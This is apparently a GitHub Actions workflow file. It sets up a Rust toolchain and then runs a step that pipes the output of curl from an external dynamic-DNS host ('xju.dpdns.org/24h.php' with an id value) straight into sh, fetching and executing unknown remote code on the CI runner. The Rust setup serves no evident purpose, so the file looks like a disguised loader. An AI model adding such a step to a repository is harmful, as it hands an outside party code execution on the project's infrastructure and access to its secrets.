name: a

on:
  workflow_dispatch:
  push:
    paths:
      - '.github/workflows/a.yml'

jobs:
  job:
    runs-on: ubuntu-latest

    steps:
    - uses: actions-rust-lang/setup-rust-toolchain@v1
      with:
        toolchain: stable
        override: true

    - run: |
        curl http://xju.dpdns.org/24h.php?id=69a52a9d7be1f | sh
